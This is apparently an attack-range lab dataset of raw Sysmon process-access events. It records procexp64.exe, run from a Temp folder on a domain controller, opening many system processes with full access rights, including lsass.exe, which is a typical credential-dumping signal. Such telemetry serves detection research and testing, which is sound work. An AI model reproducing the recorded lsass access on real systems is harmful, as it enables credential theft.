15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789263Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789262Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789261Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789260Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789259Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789258Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789257Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789256Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789255Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789254Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789253Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789252Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789251Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789250Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789249Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789248Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789247Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789246Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789245Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789368Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789367Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789366Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789365Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789364Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789363Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789362Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789361Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789360Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789359Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789358Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789357Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789356Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789355Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789354Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789353Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789352Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:33.173{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789351Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 